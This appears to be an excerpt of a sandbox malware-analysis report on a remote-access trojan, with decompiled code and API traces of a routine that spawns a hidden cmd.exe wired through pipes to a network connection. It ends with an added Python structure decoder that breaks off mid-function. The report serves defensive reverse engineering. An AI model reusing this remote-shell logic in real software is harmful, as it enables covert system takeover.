                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410648
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410655
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,00000000,00000001), ref: 00410679
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000,00000001), ref: 0041068B
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 00410694
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106A9
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106B3
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,?,?,?,00000000,00000001), ref: 004106D0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004106DC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000000,0041B310,00000000,00000002,0041B310,?), ref: 00410713
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00410720
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00410730
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 00410740
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00410750
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0041075A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000005E), ref: 00410774
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410780
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041078C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410795
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041079E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107A7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107B0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004107C2
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00416A54), ref: 004107D6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 004107E8
                                  • FindFirstFileW.KERNEL32(00000000), ref: 004107EF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898), ref: 00410817
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 00410824
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410830
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00410850
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041085A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410866
                                  • FindNextFileW.KERNEL32(?,?), ref: 0041087C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A28), ref: 00410898
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0041089F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004108AB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004108CB
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004108D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004108E1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004108FC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000005D), ref: 00410911
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041091A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041092B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410934
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@std@@$??0?$basic_string@G@2@@std@@$V?$basic_string@$Hstd@@V01@@$V10@0@$D@1@@D@2@@0@$?c_str@?$basic_string@G@2@@0@$?length@?$basic_string@V01@$??4?$basic_string@FileG@1@@V12@$??9std@@?begin@?$basic_string@?data@?$basic_string@?size@?$basic_string@?substr@?$basic_string@FindV10@$?end@?$basic_string@?find@?$basic_string@CreateFirstNextY?$basic_string@
                                  • String ID:
                                  • API String ID: 2968164691-0
                                  • Opcode ID: e95933ea7ba9c6570efcdd47d76262577301e1a728fb3cd3377a8fb22446724f
                                  • Instruction ID: 811b7e3e4f446b35303200f11341a1ba311440e0dd0279f7ab7bb97a8af00616
                                  • Opcode Fuzzy Hash: e95933ea7ba9c6570efcdd47d76262577301e1a728fb3cd3377a8fb22446724f
                                  • Instruction Fuzzy Hash: C3B11D72D0050DEBCB04EBA0EC59EEEB77CAF54345F148066F516A30A1EB745A89CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E00402B8A(char _a4) {
                                  				char _v5;
                                  				char _v6;
                                  				char _v7;
                                  				char _v8;
                                  				char _v9;
                                  				void _v16;
                                  				signed int _v20;
                                  				long _v24;
                                  				long _v28;
                                  				void* _v44;
                                  				char _v60;
                                  				char _v76;
                                  				char* _t54;
                                  				int _t68;
                                  				void* _t79;
                                  				CHAR* _t80;
                                  				int _t91;
                                  				signed int _t120;
                                  				void* _t136;
                                  				CHAR* _t142;
                                  				void* _t146;
                                  
                                  				if(( *0x41b85c & 0x00000001) != 0) {
                                  					_t142 = 0;
                                  				} else {
                                  					 *0x41b85c =  *0x41b85c | 0x00000001;
                                  					_t142 = 0;
                                  					E00402010(0x41b800, 0);
                                  					E00413E72(E00402F89);
                                  				}
                                  				if(( *0x41b85c & 0x00000002) == 0) {
                                  					 *0x41b85c =  *0x41b85c | 0x00000002;
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                  					E00413E72(E00402F7E);
                                  				}
                                  				_t50 =  &_v5;
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z(_t50);
                                  				_v20 = _v20 | 0xffffffff;
                                  				_v16 = _t142;
                                  				if( *0x41b888 != 0) {
                                  					L12:
                                  					_v24 = _t142;
                                  					PeekNamedPipe( *0x41b858, _t142, _t142, _t142,  &_v24, _t142);
                                  					if(_v24 <= _t142) {
                                  						_t146 = _t146 - 0x10;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v9);
                                  						_t54 = E004020C2(0x41b800, 0x62, 0x415664);
                                  						_v20 = _t54;
                                  					} else {
                                  						_t136 = malloc(_v24);
                                  						_t54 = ReadFile( *0x41b858, _t136, _v24,  &_v28, _t142);
                                  						if(_v28 > _t142) {
                                  							if(_v16 <= _t142) {
                                  								L18:
                                  								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t136,  &_v7);
                                  								_t146 = _t146 - 0x10;
                                  								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z(_t142, _v28,  &_v8);
                                  								_t54 = E004020C2(0x41b800, 0x62,  &_v76);
                                  								_v20 = _t54;
                                  							} else {
                                  								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  								_t68 = strncmp(_t136, _t54, _v16);
                                  								_t146 = _t146 + 0xc;
                                  								if(_t68 != 0) {
                                  									goto L18;
                                  								} else {
                                  									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t136,  &_v5);
                                  									_t146 = _t146 - 0x10;
                                  									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z(_v16, _v28 - _v16,  &_v6);
                                  									_t54 = E004020C2(0x41b800, 0x62,  &_v60);
                                  									_v20 = _t54;
                                  								}
                                  							}
                                  							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						}
                                  						free(_t136);
                                  					}
                                  					goto L22;
                                  				} else {
                                  					__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(0x41b860, "cmd.exe");
                                  					if(_t50 == 0) {
                                  						L11:
                                  						if( *0x41b888 != 0) {
                                  							do {
                                  								goto L12;
                                  								L22:
                                  								if(_v20 == 0xffffffff) {
                                  									 *0x41b889 =  *0x41b889 & 0x00000000;
                                  								}
                                  								__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  								if(_t54 <= 0) {
                                  									_v16 = _t142;
                                  								} else {
                                  									__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415770);
                                  									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(0x41b860);
                                  									__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  									WriteFile( *0x41b870,  &_v16,  &_v16,  &_v16, _t142);
                                  									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                  								}
                                  								Sleep(0x64);
                                  							} while ( *0x41b889 != 0);
                                  							TerminateProcess(0x41b878->hProcess, _t142);
                                  							CloseHandle( *0x41b87c);
                                  							_t50 = CloseHandle( *0x41b878);
                                  						}
                                  						E004020F4(_t50, 0x41b800);
                                  						CloseHandle( *0x41b858);
                                  						CloseHandle( *0x41b874);
                                  						 *0x41b888 =  *0x41b888 & 0x00000000;
                                  						_t91 = 1;
                                  					} else {
                                  						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(getenv("SystemDrive"));
                                  						__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415774);
                                  						0x41b7f0->nLength = 0xc;
                                  						 *0x41b7f8 = 1;
                                  						 *0x41b7f4 = _t142;
                                  						if(CreatePipe(0x41b7a0, 0x41b870, 0x41b7f0, _t142) == 0 || CreatePipe(0x41b858, 0x41b874, 0x41b7f0, _t142) == 0) {
                                  							_t91 = 0;
                                  						} else {
                                  							_t120 = 0x11;
                                  							memset(0x41b7a8, 0, _t120 << 2);
                                  							_t79 =  *0x41b7a0; // 0x0
                                  							 *0x41b7e0 = _t79;
                                  							_t80 =  *0x41b874; // 0x0
                                  							0x41b7a8->cb = 0x44;
                                  							 *0x41b7d4 = 0x101;
                                  							 *0x41b7d8 = _t142;
                                  							 *0x41b7e4 = _t80;
                                  							 *0x41b7e8 = _t80;
                                  							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  							 *0x41b888 = CreateProcessA(_t142, _t80, _t142, _t142, 1, _t142, _t142, _t80, 0x41b7a8, 0x41b878) & 0xffffff00 | _t81 != 0x00000000;
                                  							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z();
                                  							 *0x41b889 = 1;
                                  							E00402038(0x41b800);
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							E0040209B(0x41b800, 0x415664);
                                  							_t146 = _t146 + 0xc;
                                  							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  							_v20 = E004020C2(0x41b800, 0x93,  &_a4);
                                  							Sleep(0x12c);
                                  							_t142 = 0;
                                  							goto L11;
                                  						}
                                  					}
                                  				}
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t91;
                                  			}
                                  (Instruction address column for the decompiled routine above, 0x00402b9f to 0x00402f7d; extraction detached it from the code lines it annotated.)

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                  • getenv.MSVCRT ref: 00402C34
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                  • CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                  • CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                  • CreateProcessA.KERNEL32(00000000,00000000), ref: 00402D0E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00402D25
                                    • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • Sleep.KERNEL32(0000012C,00000093), ref: 00402D71
                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402D97
                                  • malloc.MSVCRT ref: 00402DA9
                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00402DC1
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402DDB
                                  • strncmp.MSVCRT(00000000,00000000), ref: 00402DE3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402DF8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?), ref: 00402E15
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402E3B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?), ref: 00402E52
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000062), ref: 00402E67
                                  • free.MSVCRT(00000000), ref: 00402E6E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00402E85
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402D57
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000062), ref: 00402EAB
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415770), ref: 00402EBC
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0041B860), ref: 00402ECA
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 00402ED7
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402EE0
                                  • WriteFile.KERNEL32(00000000), ref: 00402EED
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00402EFA
                                  • Sleep.KERNEL32(00000064), ref: 00402F07
                                  • TerminateProcess.KERNEL32(00000000), ref: 00402F21
                                  • CloseHandle.KERNEL32 ref: 00402F33
                                  • CloseHandle.KERNEL32 ref: 00402F3B
                                  • CloseHandle.KERNEL32 ref: 00402F52
                                  • CloseHandle.KERNEL32 ref: 00402F5A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F68
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F71
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@$D@1@@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseHandle$CreatePipeV01@@$?length@?$basic_string@FileProcessSleepY?$basic_string@$??8std@@D@2@@0@NamedPeekReadTerminateV?$basic_string@Writeconnectfreegetenvmallocstrncmp
                                  • String ID: SystemDrive$cmd.exe
                                  • API String ID: 1882443052-3633465311
                                  • Opcode ID: 798ad6d736d95c7b07d7848c9617aa5a37f0631a69e3a682c11b69c6be7a4bd8
                                  • Instruction ID: 0121bb856768c0d2b30f6d73f3edf8f7852bc9241180a475d7ad49acf624a365
                                  • Opcode Fuzzy Hash: 798ad6d736d95c7b07d7848c9617aa5a37f0631a69e3a682c11b69c6be7a4bd8
                                  • Instruction Fuzzy Hash: 97B1A531A40209EFCB01AB61DD4DAEE7FB9EB84750F14803AF911A61E0CBB84945DBDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%
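
The raw stores in the decompilation above are two Win32 structures being filled field by field: `0x41b7f0->nLength = 0xc; *0x41b7f4 = 0; *0x41b7f8 = 1` is a SECURITY_ATTRIBUTES with bInheritHandle set, and the block at 0x41b7a8 (cleared with `memset(..., 0x11 << 2)`, cb = 0x44, dwFlags = 0x101, wShowWindow = 0, hStdInput = read end of the first pipe, hStdOutput = hStdError = write end of the second pipe) is a STARTUPINFOA. Together with bInheritHandles = 1 in the CreateProcessA call this is the usual plumbing of a remote shell: a hidden cmd.exe whose console is wired to pipes the parent reads and writes. The following decoder is an added example of mine, not code from the Joe Sandbox report or from Remcos; field offsets come from winbase.h for x86, and the handle values are constructed placeholders (the dump shows zeros because the pipes did not yet exist when memory was captured).

```python
"""Decode the SECURITY_ATTRIBUTES and STARTUPINFOA blocks the decompiled
routine fills before CreateProcessA.  Offsets are x86 winbase.h values; the
addresses in the comments are the ones printed in the decompilation."""
import struct

STARTUPINFOA_SIZE = 0x44          # sizeof(STARTUPINFOA), 32-bit Windows
SECURITY_ATTRIBUTES_SIZE = 0x0c   # sizeof(SECURITY_ATTRIBUTES), 32-bit Windows
SW_HIDE = 0
STARTF_FLAGS = {
    0x001: "STARTF_USESHOWWINDOW", 0x002: "STARTF_USESIZE", 0x004: "STARTF_USEPOSITION",
    0x008: "STARTF_USECOUNTCHARS", 0x010: "STARTF_USEFILLATTRIBUTE",
    0x020: "STARTF_RUNFULLSCREEN", 0x040: "STARTF_FORCEONFEEDBACK",
    0x080: "STARTF_FORCEOFFFEEDBACK", 0x100: "STARTF_USESTDHANDLES", 0x200: "STARTF_USEHOTKEY",
}
# STARTUPINFOA field offsets; the struct base is 0x41b7a8 in the dump
OFF_CB, OFF_DWFLAGS, OFF_WSHOWWINDOW = 0x00, 0x2c, 0x30
OFF_HSTDINPUT, OFF_HSTDOUTPUT, OFF_HSTDERROR = 0x38, 0x3c, 0x40


def build_security_attributes() -> bytes:
    """0x41b7f0->nLength = 0xc; *0x41b7f4 = NULL; *0x41b7f8 = 1 (bInheritHandle)."""
    return struct.pack("<III", SECURITY_ATTRIBUTES_SIZE, 0, 1)


def build_startupinfo(h_stdin: int, h_stdout: int) -> bytes:
    """Replay the stores made before CreateProcessA.  h_stdin / h_stdout are
    constructed placeholder handle values, not values from the dump."""
    si = bytearray(STARTUPINFOA_SIZE)                       # memset(0x41b7a8, 0, 0x11 << 2)
    struct.pack_into("<I", si, OFF_CB, STARTUPINFOA_SIZE)   # 0x41b7a8->cb = 0x44
    struct.pack_into("<I", si, OFF_DWFLAGS, 0x101)          # *0x41b7d4 = 0x101
    struct.pack_into("<I", si, OFF_WSHOWWINDOW, 0)          # *0x41b7d8 = 0 (wShowWindow + cbReserved2)
    struct.pack_into("<I", si, OFF_HSTDINPUT, h_stdin)      # *0x41b7e0 = read end of pipe 1
    struct.pack_into("<I", si, OFF_HSTDOUTPUT, h_stdout)    # *0x41b7e4 = write end of pipe 2
    struct.pack_into("<I", si, OFF_HSTDERROR, h_stdout)     # *0x41b7e8 = same write end
    return bytes(si)


def decode_security_attributes(blob: bytes) -> dict:
    n, sd, inherit = struct.unpack_from("<III", blob, 0)
    return {"nLength": n, "lpSecurityDescriptor": sd, "bInheritHandle": bool(inherit)}


def decode_startupinfo(blob: bytes) -> dict:
    names = ("cb", "lpReserved", "lpDesktop", "lpTitle", "dwX", "dwY", "dwXSize",
             "dwYSize", "dwXCountChars", "dwYCountChars", "dwFillAttribute", "dwFlags",
             "wShowWindow", "cbReserved2", "lpReserved2", "hStdInput", "hStdOutput",
             "hStdError")
    return dict(zip(names, struct.unpack_from("<12I2H4I", blob, 0)))


def flag_names(dw_flags: int) -> list:
    return [name for bit, name in sorted(STARTF_FLAGS.items()) if dw_flags & bit]


def shell_indicators(si: dict, sa: dict) -> dict:
    """Traits that together mean: a hidden child whose console is wired to pipes
    the parent can read from and write to, i.e. the plumbing of a remote shell."""
    flags = si["dwFlags"]
    return {
        "hidden_window": bool(flags & 0x1) and si["wShowWindow"] == SW_HIDE,
        "std_handles_redirected": bool(flags & 0x100) and si["hStdInput"] != 0 and si["hStdOutput"] != 0,
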